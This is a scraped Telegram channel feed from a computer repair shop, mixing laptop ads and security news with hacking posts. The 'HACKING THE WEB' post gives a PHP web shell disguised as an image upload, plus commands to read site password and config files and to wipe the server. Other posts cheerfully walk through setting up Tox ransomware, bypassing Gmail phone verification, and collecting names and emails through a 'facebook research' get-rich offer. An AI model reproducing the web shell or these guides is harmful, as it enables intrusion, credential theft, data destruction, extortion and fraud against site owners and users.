Geeks Tech computers
987 subscribers
433 photos
10 videos
37 files
356 links
Computer repair,laptop sales & accessories available
Download Telegram
Am buying dead & used laptops with everything intact kindly inbox, turn your dead laptops into cash inbox me @febifebian
FireEye: Russian Research Lab Aided the Development of TRITON Industrial Malware

Cybersecurity firm FireEye claims to have discovered evidence that proves the involvement of a Russian-owned research institute in the development of the TRITON malware that caused some industrial systems to unexpectedly shut down last year, including a petrochemical plant in Saudi Arabia.

TRITON, also known as Trisis, is a piece of ICS malware designed to target the Triconex Safety

@Geekstechcomputers
🔴 How to recover deleted image or video from android (internal
storage) without root

▪️STEP 1: DOWNLOAD AND INSTALL JIHOSOFT
ANDROID PHONE RECOVERY AT YOUR COMPUTER.

👉You could download the Windows version at:
Android Recovery , download Mac version at:
Android Recovery for Mac . After download, you will
be lead to install the app at your computer.

▪️STEP 2: SELECT DATA GENRE THAT YOU NEED TOSCANAfter installation, run the app at your PC. You willsee the interface show you four options:

👉“Mul”, “Database”, “WhatsApp”, “All”. Tap
One of it according to your own demand.

▪️STEP 3: IDENTIFY ANDROID PHONE OR TABLET BY COMPUTER.

👉First, connect your android device to computer via USB cable. Then, turn on USB debugging at android
equipment.If the app failed to identify your equipment, install related USB driver at your computer.

▪️STEP 4: SCAN ANDROID DEVICE AND EXPECT THE RESULT

👉After identification, click "Start" for scanning.

Please be patient about the process.

▪️STEP 5: PREVIEW DATA THAT LISTED ON THE
RESULT.

👉You will be able to review all the details of desired
data.

▪️STEP 6: RECOVER DATA FROM ANDROID WITHOUT
ROOT.

👉Mark those data that you want, then tap “Recover”to fulfill android data recovery without root.
HACKING THE WEB
method: uploading a php shell on the site
a lot of sites run php. when you put php code in an image and upload it to a server, the server will execute it
so open notepad and type these codes
<?php
if (isset($_REQUEST['cmd'])){
$cmd = $_GET['cmd'];
system($cmd);
} else {
echo "error opening image"
}
save the file as img.png and upload it to the site you want to hack (if they have image upload available)
after uploading the image, click on it and look at the url (it will end in img.png
now add
?cmd=locate+my.cnf
this command will look for the php password file
you will see some text like
/home/www/my.cnf
then read it using
?cmd=cat+/home/www/my.cnf
use this to find the database and read it using cat
?cmd=locate+*.db
use this to find the configuration file for the site(contains passwords)
?cmd=locate+config.php
use this to format the hard disk of the site
;)
?cmd=rm+-rf
👌Done happy hacking.
Simple steps to avoid being a Cybercrime Victim

1.Avoid using public networks.Refrain from connecting to free Wi-Fi networks from coffee shops or other public places. Connecting your device to public networks exposes it potential hackers that can easily get through the low level security of these kinds of networks.

2.Avoid using public computers for sensitive business. If you’re about to do some personal transactions like banking or online shopping, do not do it using public computers. Other people who have used the computers before you may have put programs that can record the passwords you type in.

3.Do not give out your passwords.Keep the passwords of your various accounts to yourself. If you do let someone know, make sure to change it afterwards to prevent that person from accessing your private internet accounts without permission.

4.Avoid downloading unknown applications. The Internet is full of free software from unknown sources. These kinds of programs normally carry malicious applications with it and installing it may infect and cause serious damage to your computer.
upgrade your laptop with high speed pc3l ram @2500 only......inbox me @febifebian
*iPhone users with iOS 10 and above*

We are looking for iOS 10 or above users to participate in facebook research program which you will earn 100-500$ without doing anything

*Please the time is here, act now and earn big without doing anything, no investment*

Please send your *Full name and email address* to mr now to *get invitation.*

Join our group for more info
👇👇👇🤳🏾👇👇👇
*iPhone users with iOS 10 and above*
https://t.me/joinchat/JX5DfEiST7paUgG7DcXL6A

We are looking for iOS 10 or above users to participate in facebook research program which you will earn 100-500$ without doing anything

*Please the time is here, act now and earn big without doing anything, no investment*

Please send your *Full name and email address* to me now to *get invitation.*
HOW TO MAKE A RANSOMWARE?

McAfee discovered in the deep web a ransomware-construction kits that allow easy to build malware in just 3 steps.

TOX — FREE RANSOMWARE KIT

- Now, to spread this creepy threat more easily by even a non-tech user, one dark web hacker has released a ransomware-as-a-service kit, dubbed “Tox,” for anyone to download and set up their own ransomware for free.

- Tox is completely free to use. The developers of the online software make money by taking a cut (20%) of any successful ransomware campaigns its users run.

- Tox, which runs on TOR, requires not much technical skills to use and is designed in such a way that almost anyone can easily deploy ransomware in three simple steps, according to security researchers at McAfee who discovered the kit.

- Tox is free. You just have to register on the site.

- Tox is dependent on TOR and Bitcoin. That allows for some degree of anonymity.

- The malware works as advertised.

😁Out of the gate, the standard of antimalware evasion is fairly high, meaning the malware’s targets would need additional controls in place (HIPS, whitelisting, sandboxing) to catch or prevent this.
------------------------------------------------------

HOW TO SETUP YOUR CUSTOM RANSOMWARE?

It takes only a few seconds to create and set up your custom ransomware.

👉Just create an account on the Tox website, without the need to provide your email address or any other identifying information.

👉Once a user register with the site, follow these three simple steps to creating your own malware:

👉Type a desired ransom amount you want to ask victims for.

👉Provide an additional note in the “Cause“, presumably the message that will alert victims that they are being held hostage to a piece of malware.

😍Finally, you are prompted to fill out a captcha, and click “Create“.

- This process creates an executable of about 2MB that is disguised as a .scr file,” McAfee explains. “Then the Tox  users distribute and install as they see fit. The Tox site (runs on the TOR network) will track the installs and profit. To withdraw funds, you need only supply a receiving Bitcoin address.

🤭The most important part is that, the bitcoin paid by the victim will be credited to users account. Tox will keep a 30% fee of the income.

- As it seems tox ransomware is a new breed of malware as a service allowing anyone to earn Bitcoins without requiring any hacking or programming skills. Thus creating a new trend of malware spreading.
📲HOW TO BYPASS GMAIL MOBILE VERIFICATION TUTORIAL📲


STEP-1

♻️Go to K7.net Sign up there.


STEP-2

♻️Create an account on gmail, but in location fill United States.


STEP-3

♻️After Creating your e-mail account,Now it will take you to mobile verification page.

STEP-4

♻️Here select the option of Voice call and fill the no: that you got from the website (k7.net)


STEP-5

♻️Now you will get a mail having verification code as voice mail on that account from which you have registered on.

STEP-6

♻️Go open it,
download
the attachment file and listen the code after that type the code of your voice mail in verification code and click
OK

Done. Your account is ready now.
🛡 @Geekstechcomputers
*Teaser 3 - GBWhatsApp 6.60* 😍

✔️ Enabled - Stickers 😁

*Stay Tuned for Big Update* 😅

TEAM
Geeks😎
Windows Built-in Antivirus Gets Secure Sandbox Mode – Turn It ON
https://thehackernews.com/2018/10/windows-defender-antivirus-sandbox.html